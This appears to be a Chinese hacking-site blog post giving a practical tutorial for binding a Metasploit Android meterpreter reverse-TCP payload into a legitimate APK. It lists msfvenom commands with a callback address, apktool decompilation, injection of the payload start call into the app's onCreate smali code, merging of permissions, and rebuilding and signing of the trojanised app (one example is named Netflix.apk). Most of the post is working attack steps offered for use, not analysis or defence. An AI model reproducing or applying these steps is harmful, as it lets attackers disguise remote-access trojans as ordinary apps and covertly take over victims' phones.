雨云服务器助你轻松搭建内网穿透,解决无公网IP问题。-X黑手网
点击查看-X黑手网
点击查看-X黑手网
将木马程序捆绑到正常应用

将木马程序捆绑到正常应用

在msf中其实通过help命令就可以看到,我们可以加-x [正常应用.apk]这个参数来进行捆绑:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.83 lport=5555 -x 1.apk R>2.apk

(rootkali)-[/]
# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.83 lport=5555 -x 1.apk R>2.apk
Using APK template: 1.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: apktool not found. If it’s not in your PATH, please add it.

执行一看,缺少apktool 这个java脚本,我发现在usr/share/目录下并没有找到apktool这个文件夹,于是我手动创建了一个,并在官网下载了最新版apktool.jar,但执行后还是一样的报错。我就去万能的互联网寻找到了解决方法(https://blog.csdn.net/qq_30508729/article/details/120108136)。
就是使用下面的代码来生成:
msfvenom -a java –platform android -p android/meterpreter/reverse_tcp lhost=192.168.1.83 lport=5555 -x 1.apk R>2.apk
虽然没有报错,但并没有捆绑成功。

所以选用手动捆绑。
也可以使用一些自动化捆绑工具如backdoor-apk (https://github.com/dana-at-cp/backdoor-apk)

正常软件:1.apk
后门程序:2.apk
编译:apktool

先生成后门程序2.apk
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.83 lport=5555 R>2.apk

接着反编译1.apk和2.apk
apt install apktool #下载apktool
apktool d 1.apk
apktool d 2.apk

开始寻找1.apk文件的入口,在1的AndroidManifest.xml文件中查找Main和Launch关键词,定位到所对应的启动smail文件

直接搜索onCreat函数,找到bundle对象,你并在下面添加启动payload代码:invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

点击保存之后呢,我们还要把刚才反编译的payload文件中的smail代码复制过来,把1的smail/com/metasploit文件复制到的smail/com/目录下。

把2中的AndroidManifest.xml中的权限复制到1的AndroidManifest.xml中。注意删除重复项。

保存退出,剩下的就是回编译签名了。

回编译:apktool b /1

生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

签名:jarsigner -keystore mykey.keystore Netflix.apk alias_name -sigalg MD5withRSA -digestalg SHA1

就OK了

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容